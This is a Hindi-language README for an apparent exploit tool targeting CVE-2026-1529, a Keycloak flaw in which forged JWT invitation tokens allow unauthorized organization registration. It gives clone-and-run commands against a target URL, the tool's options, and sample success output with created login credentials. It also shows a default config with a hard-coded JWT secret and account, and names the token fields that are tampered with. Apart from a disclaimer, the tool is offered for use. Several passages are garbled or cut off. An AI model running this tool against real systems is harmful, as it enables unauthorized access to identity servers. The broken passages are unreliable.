
CVE-2026-1529 के लिए शोषण उपकरण, जो JWT टोकन हेरफेर के माध्यम से Keycloak में अनधिकृत संगठन पंजीकरण प्रदर्शित करता है। इसमें टोकन निर्माण, हेरफेर, और रिपोर्ट निर्माण के साथ उपयोगकर्ता पंजीकरण शामिल है।
Keycloak: अनुचित आमंत्रण टोकन सत्यापन के माध्यम से अनधिकृत संगठन पंजीकरण
यह टूल केवल शैक्षिक और सुरक्षा परीक्षण उद्देश्यों के लिए है। केवल उन सिस्टमों पर उपयोग करें जिनके परीक्षण की आपके पास स्पष्ट अनुमति है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध और अनैतिक है। इस टूल के लेखक इस सॉफ़्टवेयर के किसी भी दुरुपयोग या क्षति के लिए ज़िम्मेदार नहीं हैं।
निर्माता: f3ds cr3w est, 2002
CVE-2026-1529 Keycloak में एक गंभीर भेद्यता है जो अनुचित आमंत्रण टोकन सत्यापन के माध्यम से अनधिकृत संगठन पंजीकरण की अनुमति देती है। यह एक्सप्लॉइट टूल JWT टोकन में हेरफेर करके उपयोगकर्ताओं को अनधिकृत संगठनों में पंजीकृत करके भेद्यता को प्रदर्शित करता है।
भेद्यता संगठन आमंत्रणों के लिए JWT टोकन सत्यापन प्रक्रिया में मौजूद है। हमलावर JWT पेलोड में और फ़ील्ड में हेरफेर कर सकते हैं, जिससे वे उचित प्राधिकरण के बिना किसी भी संगठन में उपयोगकर्ताओं को पंजीकृत कर सकते हैं।
org_idemailgit clone https://github.com/ninjazan420/CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation
cd CVE-2026-1529-POC
pip install -r requirements.txt
chmod +x keycloak-exploit.py
# लक्ष्य URL के साथ मानक उपयोग
python keycloak-exploit.py https://target-keycloak.com
# सहायता दिखाएं
python keycloak-exploit.py -h
# संस्करण दिखाएं
python keycloak-exploit.py -v
# कस्टम आमंत्रण टोकन का उपयोग करें
python keycloak-exploit.py -t eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9 https://target-keycloak.com
# कस्टम संगठन ID का उपयोग करें
python keycloak-exploit.py -o custom_org_id https://target-keycloak.com
# कस्टम कॉन्फ़िगरेशन फ़ाइल का उपयोग करें
python keycloak-exploit.py -c custom_config.json https://target-keycloak.com
# डीबग लॉगिंग सक्षम करें
python keycloak-exploit.py -d https://target-keycloak.com
| विकल्प | विवरण | आवश्यक |
|---|---|---|
target | लक्ष्य Keycloak URL (IP या डोमेन) | हाँ |
-t, --token | उपयोग करने के लिए कस्टम आमंत्रण टोकन | नहीं |
-o, --org-id | कस्टम संगठन ID | नहीं |
-c, --config | कॉन्फ़िगरेशन फ़ाइल का पथ | नहीं |
-d, --debug | डीबग लॉगिंग सक्षम करें | नहीं |
-v, --version | संस्करण जानकारी दिखाएं | नहीं |
-h, --help | सहायता संदेश दिखाएं | नहीं |
जब एक्सप्लॉइट सफल होता है, तो आपको इस तरह का आउटपुट दिखाई देगा:
=============================================================
CVE-2026-1529 EXPLOIT RESULTS
=============================================================
✓ Target is vulnerable to CVE-2026-1529
🎯 EXPLOIT SUCCESSFUL!
Username: admin_user_2026
Password: KeycloakCVE2026!
Email: [email protected]
Login Link: https://target-keycloak.com/realms/master/account
📄 Report saved to: output/reports/exploit_report_20260210_134556.txt
🔐 Use the provided credentials to access the Keycloak instance!
⚠️ This demonstrates unauthorized access due to CVE-2026-1529
=============================================================
by f3ds cr3w est, 2002
=============================================================
यदि एक्सप्लॉइट विफल हो जाता है, तो आपको दिखाई देगा:
=============================================================
CVE-2026-1529 EXPLOIT RESULTS
=============================================================
✗ Target is not vulnerable
❌ EXPLOIT FAILED!
Check logs for details: logs/exploit.log
CVE-2026-1529-POC/
├── keycloak-exploit.py # मुख्य एक्सप्लॉइट स्क्रिप्ट
├── requirements.txt # Python निर्भरताएँ
├── README.md # यह फ़ाइल
├── config/
│ └── default_config.json # डिफ़ॉल्ट कॉन्फ़िगरेशन
├── utils/
│ ├── jwt_utils.py # JWT हेरफेर उपयोगिताएँ
│ ├── http_utils.py # HTTP क्लाइंट उपयोगिताएँ
│ └── crypto_utils.py # क्रिप्टोग्राफ़िक उपयोगिताएँ
├── output/
│ ├── logs/ # लॉग फ़ाइलें
│ └── reports/ # एक्सप्लॉइट रिपोर्ट
टूल निम्नलिखित सेटिंग्स के साथ एक डिफ़ॉल्ट कॉन्फ़िगरेशन फ़ाइल (config/default_config.json) का उपयोग करता है:
{
"exploit": {
"default_username": "admin_user_2026",
"default_password": "KeycloakCVE2026!",
"default_email": "[email protected]",
"timeout": 30,
"max_retries": 3
},
"jwt": {
"algorithm": "HS256",
"secret_key": "keycloak-cve-2026-1529-exploit",
"token_expiry": 3600
},
"target": {
"endpoints": {
"realms": "/realms",
"organizations": "/organizations",
"register": "/register",
"login": "/login"
}
},
"output": {
"log_level": "INFO",
"save_reports": true,
"report_format": "txt"
}
}
आप एक कस्टम कॉन्फ़िगरेशन फ़ाइल बना सकते हैं और इसे -c विकल्प के साथ उपयोग कर सकते हैं:
{
"exploit": {
"default_username": "custom_user",
"default_password": "CustomPassword123!",
"default_email": "[email protected]",
"timeout": 60,
"max_retries": 5
},
"jwt": {
"algorithm": "HS256",
"secret_key": "custom-secret-key",
"token_expiry": 7200
}
}
टूल अनुचित JWT सत्यापन का शोषण निम्नलिखित तरीके से करता है:
org_id फ़ील्ड को संशोधित करनाemail फ़ील्ड को संशोधित करनाकनेक्शन त्रुटियाँ
टोकन सत्यापन त्रुटियाँ
org_id, email, invitation_type) शामिल हैंपंजीकरण विफलताएँ
विस्तृत समस्या निवारण के लिए डीबग लॉगिंग सक्षम करें:
python keycloak-exploit.py -d https://target-keycloak.com
logs/exploit.logoutput/reports/exploit_report_YYYYMMDD_HHMMSS.txtटूल निम्नलिखित जांच करता है:
एक्सप्लॉइट को सफल माना जाता है यदि:
यह टूल केवल शैक्षिक और सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। अपने जोखिम पर उपयोग करें।
निर्माता: f3ds cr3w est, 2002
संपर्क: प्रश्नों या प्रतिक्रिया के लिए, कृपया प्रोजेक्ट रिपॉजिटरी देखें।
याद रखें: महान शक्ति के साथ महान ज़िम्मेदारी आती है। इस टूल का उपयोग समझदारी और नैतिक रूप से करें।
by f3ds cr3w est, 2002